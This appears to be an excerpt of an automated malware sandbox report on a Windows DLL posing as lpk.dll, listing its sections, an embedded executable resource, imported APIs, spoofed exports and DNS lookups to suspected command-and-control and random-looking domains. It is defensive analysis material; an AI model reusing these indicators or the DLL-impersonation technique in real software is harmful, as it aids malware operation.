IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0xe4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb2c	0xc00	c9b6b9fbded3d4764666702b145428d1	False	0.5309244791666666	data	5.5469519714251785	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x9c9	0xa00	6951ee1a0ff3a7f5a44727b4713506a3	False	0.45625	data	4.848258137282876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3000	0x2a0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4000	0x7fa90	0x7fc00	f159957b21522c25ce75e01a9f8424af	False	0.8357769691780822	data	7.582701442901576	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x84000	0x1ee	0x200	cfa8d04dd000bb30ab126902176ed40d	False	0.7265625	data	5.091827714746989	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_RCDATA	0x4088	0x7	ASCII text, with no line terminators			2.142857142857143
RT_RCDATA	0x4090	0x7fa00	PE32 executable (GUI) Intel 80386, for MS Windows			0.8364559102595495

Imports

DLL	Import
KERNEL32.dll	ExitProcess, GetProcAddress, RtlMoveMemory, LoadLibraryW, lstrcatW, GetSystemDirectoryW, FreeLibrary, lstrcpynA, LockResource, LoadResource, SizeofResource, FindResourceW, CreateProcessW, RtlZeroMemory, CloseHandle, WriteFile, CreateFileW, GetTempFileNameW, GetTempPathW, GetLastError, CreateMutexA, lstrcmpiW, GetModuleFileNameW, GetExitCodeProcess, TerminateProcess, WaitForSingleObject, GetCurrentThreadId, GetFileAttributesW, lstrcpyW, GetTickCount, GetLogicalDrives, FindNextFileW, SetFileAttributesW, CopyFileW, FindClose, FindFirstFileW, WaitForMultipleObjects, TerminateThread, ResumeThread, SetThreadPriority, CreateThread, SetEvent, CreateEventW, DisableThreadLibraryCalls
USER32.dll	wsprintfW
SHELL32.dll
SHLWAPI.dll	SHRegGetValueW, PathFindExtensionW, PathFindFileNameW, PathAppendW, PathRemoveFileSpecW, StrStrIW

Exports

Name	Ordinal	Address
LpkDllInitialize	2	0x10001af6
LpkDrawTextEx	3	0x10001afc
LpkEditControl	4	0x10003250
LpkExtTextOut	5	0x10001b02
LpkGetCharacterPlacement	6	0x10001b08
LpkGetTextExtentExPoint	7	0x10001b0e
LpkInitialize	8	0x10001b14
LpkPSMTextOut	9	0x10001b1a
LpkTabbedTextOut	1	0x10001af0
LpkUseGDIWidthCache	10	0x10001b20
ftsWordBreak	11	0x10001b26

Network Behavior

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 15:33:35.972465992 CET	53	63515	1.1.1.1	192.168.2.9
Dec 19, 2024 15:33:36.111417055 CET	53	61936	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:06.362107992 CET	53	54263	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:06.602019072 CET	53	53301	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:28.379374981 CET	53	62070	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:28.631716013 CET	53	51868	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.300059080 CET	53	63967	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.312489986 CET	53	55048	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.520984888 CET	53	54903	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.543800116 CET	53	50533	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.701775074 CET	53	55429	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.788747072 CET	53	50015	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.824377060 CET	53	62983	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.923343897 CET	53	51585	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:36.963341951 CET	53	54775	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.007343054 CET	53	59052	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.104284048 CET	53	50215	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.188019991 CET	53	63453	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.325867891 CET	53	55158	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.422174931 CET	53	52469	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.507220030 CET	53	50622	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.648045063 CET	53	55019	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.725368023 CET	53	59433	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.874320030 CET	53	49594	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:37.962702990 CET	53	62003	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.109944105 CET	53	58117	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.184663057 CET	53	59736	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.329371929 CET	53	54954	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.402184010 CET	53	59866	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.510868073 CET	53	59722	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.634977102 CET	53	61001	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.691390038 CET	53	54314	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.816154003 CET	53	53984	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.920789957 CET	53	65516	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:38.998225927 CET	53	63504	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.101792097 CET	53	61590	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.181293011 CET	53	59268	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.320240974 CET	53	64711	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.367644072 CET	53	54851	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.538873911 CET	53	55814	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.616287947 CET	53	54631	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.721647024 CET	53	55970	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.859559059 CET	53	55256	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:39.948848963 CET	53	56206	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.089364052 CET	53	65175	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.168636084 CET	53	57953	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.278978109 CET	53	55299	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.421591043 CET	53	54710	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.518163919 CET	53	52085	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.640398979 CET	53	54057	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.754545927 CET	53	54950	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.825968981 CET	53	63334	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:40.979640961 CET	53	63370	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.060724020 CET	53	51569	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.211901903 CET	53	52781	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.279735088 CET	53	54121	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.440488100 CET	53	56350	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.462709904 CET	53	64938	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.671998024 CET	53	59743	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.701421976 CET	53	54607	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:41.898536921 CET	53	54430	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:42.079987049 CET	53	56136	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:42.311870098 CET	53	59404	1.1.1.1	192.168.2.9
Dec 19, 2024 15:34:42.536526918 CET	53	61729	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:03.350871086 CET	53	54936	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:03.394823074 CET	53	50265	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:03.578607082 CET	53	58838	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:03.582566977 CET	53	56736	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:03.770586967 CET	53	55541	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:03.800800085 CET	53	54657	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:03.952553988 CET	53	52486	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.033925056 CET	53	55008	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.139137030 CET	53	50186	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.238678932 CET	53	59439	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.395212889 CET	53	59892	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.467956066 CET	53	53674	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.638103008 CET	53	55548	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.682588100 CET	53	54629	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.864712000 CET	53	53616	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:04.883445024 CET	53	60749	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.045619965 CET	53	53632	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.068346977 CET	53	49362	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.245019913 CET	53	51751	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.249295950 CET	53	63128	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.427812099 CET	53	50585	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.433959961 CET	53	50368	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.609544992 CET	53	62797	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.668299913 CET	53	59905	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.834417105 CET	53	64798	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:05.892966032 CET	53	49182	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.055741072 CET	53	55797	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.074935913 CET	53	60047	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.289144993 CET	53	55779	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.306397915 CET	53	57210	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.518754959 CET	53	56926	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.536212921 CET	53	53474	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.699908018 CET	53	51190	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.754856110 CET	53	51935	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.943458080 CET	53	59717	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:06.974953890 CET	53	59777	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.160556078 CET	53	54372	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.205284119 CET	53	58827	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.282627106 CET	53	61519	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.341500044 CET	53	59634	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.442260981 CET	53	57589	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.534462929 CET	53	53401	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.560956955 CET	53	61185	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.622987986 CET	53	63565	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.789011955 CET	53	56472	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.804516077 CET	53	53092	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:07.977781057 CET	53	49328	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.032006979 CET	53	56268	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.171752930 CET	53	56745	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.268048048 CET	53	65074	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.352608919 CET	53	61658	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.503804922 CET	53	64956	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.533628941 CET	53	65372	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.685610056 CET	53	63574	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.716984987 CET	53	55690	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.876835108 CET	53	55988	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:08.900669098 CET	53	60293	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.094142914 CET	53	62175	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.149358988 CET	53	58668	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.317775011 CET	53	53830	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.331675053 CET	53	51803	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.542273998 CET	53	51628	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.637557983 CET	53	58999	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.822566032 CET	53	57642	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:09.858601093 CET	53	52582	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.026566029 CET	53	52756	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.087979078 CET	53	64020	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.255309105 CET	53	57122	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.271501064 CET	53	49471	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.439230919 CET	53	56719	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.453130960 CET	53	64836	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.634955883 CET	53	56669	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.664942980 CET	53	62416	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.815491915 CET	53	64712	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:10.888297081 CET	53	55749	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.034111023 CET	53	55986	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.118899107 CET	53	61883	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.215780020 CET	53	52912	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.355884075 CET	53	61336	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.451107025 CET	53	61517	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.536396980 CET	53	64349	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.687649012 CET	53	57226	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.775365114 CET	53	54180	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.909569025 CET	53	63295	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:11.997375965 CET	53	51701	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.139534950 CET	53	53030	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.178018093 CET	53	54045	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.332071066 CET	53	63535	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.401361942 CET	53	59782	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.567636967 CET	53	58019	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.626651049 CET	53	55549	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.793734074 CET	53	50518	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:12.860377073 CET	53	57194	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.033847094 CET	53	63036	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.082411051 CET	53	49165	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.215399027 CET	53	50689	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.265539885 CET	53	61630	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.451244116 CET	53	49246	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.494138956 CET	53	58404	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.686276913 CET	53	50440	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.722259998 CET	53	58276	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.869555950 CET	53	61303	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:13.975040913 CET	53	63188	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.104053974 CET	53	57867	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.239650965 CET	53	65366	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.288609982 CET	53	55844	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.421652079 CET	53	51462	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.469636917 CET	53	56626	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.651031017 CET	53	49401	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.713499069 CET	53	56260	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.887837887 CET	53	62018	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:14.943367958 CET	53	57437	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.108603001 CET	53	61257	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.162457943 CET	53	63187	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.291383028 CET	53	54105	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.397140980 CET	53	62409	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.511097908 CET	53	51760	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.616491079 CET	53	62011	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.732256889 CET	53	52286	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.839611053 CET	53	49993	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:15.914638042 CET	53	58831	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.020721912 CET	53	51823	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.141273022 CET	53	65403	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.201673985 CET	53	51881	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.371999979 CET	53	62527	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.432153940 CET	53	53610	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.594228029 CET	53	55195	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.668313980 CET	53	51920	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.817848921 CET	53	58414	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:16.849843979 CET	53	50074	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:17.036968946 CET	53	57587	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:17.086853027 CET	53	53017	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:17.268016100 CET	53	55998	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:17.497692108 CET	53	54875	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:17.678555965 CET	53	51381	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:18.261238098 CET	53	63019	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:18.261274099 CET	53	63019	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:18.494995117 CET	53	64172	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:18.729051113 CET	53	64176	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:18.958005905 CET	53	53767	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:19.186500072 CET	53	62476	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:19.426672935 CET	53	65316	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:19.607605934 CET	53	55395	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:19.789875031 CET	53	57346	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:20.012708902 CET	53	60851	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:20.804527998 CET	53	57170	1.1.1.1	192.168.2.9
Dec 19, 2024 15:35:20.943695068 CET	53	53830	1.1.1.1	192.168.2.9

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 15:33:30.426660061 CET	1.1.1.1	192.168.2.9	0xbc9c	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:33:30.426660061 CET	1.1.1.1	192.168.2.9	0xbc9c	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:33:35.972465992 CET	1.1.1.1	192.168.2.9	0x76ae	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:33:36.111417055 CET	1.1.1.1	192.168.2.9	0x39e8	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:06.362107992 CET	1.1.1.1	192.168.2.9	0xa43f	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:06.602019072 CET	1.1.1.1	192.168.2.9	0x2285	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:28.379374981 CET	1.1.1.1	192.168.2.9	0xf3dc	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:28.631716013 CET	1.1.1.1	192.168.2.9	0x84c9	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.300059080 CET	1.1.1.1	192.168.2.9	0x7a0f	Name error (3)	vdafki.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.312489986 CET	1.1.1.1	192.168.2.9	0x9b31	Name error (3)	eqoxwa.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.520984888 CET	1.1.1.1	192.168.2.9	0x70ed	Name error (3)	aubtoq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.543800116 CET	1.1.1.1	192.168.2.9	0x6dab	Name error (3)	acxyxy.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.701775074 CET	1.1.1.1	192.168.2.9	0x803a	Name error (3)	myivov.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.788747072 CET	1.1.1.1	192.168.2.9	0x3ed4	Name error (3)	rmqiuq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.824377060 CET	1.1.1.1	192.168.2.9	0x3811	Server failure (2)	ilo.brenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.923343897 CET	1.1.1.1	192.168.2.9	0xa31a	Name error (3)	zgawte.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:36.963341951 CET	1.1.1.1	192.168.2.9	0xf726	Server failure (2)	ant.trenz.pl	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.007343054 CET	1.1.1.1	192.168.2.9	0x842a	Name error (3)	gkbtuu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.104284048 CET	1.1.1.1	192.168.2.9	0x82b3	Name error (3)	dkevii.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.188019991 CET	1.1.1.1	192.168.2.9	0x592c	Name error (3)	qfstid.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.325867891 CET	1.1.1.1	192.168.2.9	0xcbc1	Name error (3)	jsioue.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.422174931 CET	1.1.1.1	192.168.2.9	0x192b	Name error (3)	nlqjng.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.507220030 CET	1.1.1.1	192.168.2.9	0x1d27	Name error (3)	vlscru.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.648045063 CET	1.1.1.1	192.168.2.9	0x84e0	Name error (3)	ctpiwy.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.725368023 CET	1.1.1.1	192.168.2.9	0x4d95	Name error (3)	wohbil.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.874320030 CET	1.1.1.1	192.168.2.9	0x9f37	Name error (3)	pyhqpe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:37.962702990 CET	1.1.1.1	192.168.2.9	0x6e81	Name error (3)	rqmoov.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.109944105 CET	1.1.1.1	192.168.2.9	0x9895	Name error (3)	qyhuju.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.184663057 CET	1.1.1.1	192.168.2.9	0x54d5	Name error (3)	tcepna.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.329371929 CET	1.1.1.1	192.168.2.9	0x49a2	Name error (3)	uepolc.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.402184010 CET	1.1.1.1	192.168.2.9	0xecca	Name error (3)	faxkac.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.510868073 CET	1.1.1.1	192.168.2.9	0xc083	Name error (3)	qtvtoh.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.634977102 CET	1.1.1.1	192.168.2.9	0x7393	Name error (3)	dazrfy.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.691390038 CET	1.1.1.1	192.168.2.9	0x3bf9	Name error (3)	engkkn.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.816154003 CET	1.1.1.1	192.168.2.9	0x59b4	Name error (3)	xshsnl.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.920789957 CET	1.1.1.1	192.168.2.9	0x7e19	Name error (3)	eekder.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:38.998225927 CET	1.1.1.1	192.168.2.9	0xe865	Name error (3)	qgwhsw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.101792097 CET	1.1.1.1	192.168.2.9	0xe748	Name error (3)	goyzko.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.181293011 CET	1.1.1.1	192.168.2.9	0xf305	Name error (3)	uquewo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.320240974 CET	1.1.1.1	192.168.2.9	0xe309	Name error (3)	jzaoby.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.367644072 CET	1.1.1.1	192.168.2.9	0xe666	Name error (3)	hxhxsk.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.538873911 CET	1.1.1.1	192.168.2.9	0xd7b2	Name error (3)	eoswhi.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.616287947 CET	1.1.1.1	192.168.2.9	0x66a9	Name error (3)	ilommd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.721647024 CET	1.1.1.1	192.168.2.9	0x3911	Name error (3)	ugiwuc.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.859559059 CET	1.1.1.1	192.168.2.9	0x1130	Name error (3)	ecbklt.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:39.948848963 CET	1.1.1.1	192.168.2.9	0x6a98	Name error (3)	lniyuv.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.089364052 CET	1.1.1.1	192.168.2.9	0xbb45	Name error (3)	fopopy.com	none	none	A (IP address)	IN (0x0001)	false
Dec 19, 2024 15:34:40.168636084 CET	1.1.1.1	192.168.2.9	0x8979	Name error (3)	vbahvh.com	none	none	A (IP address)	IN (0x0001)	false
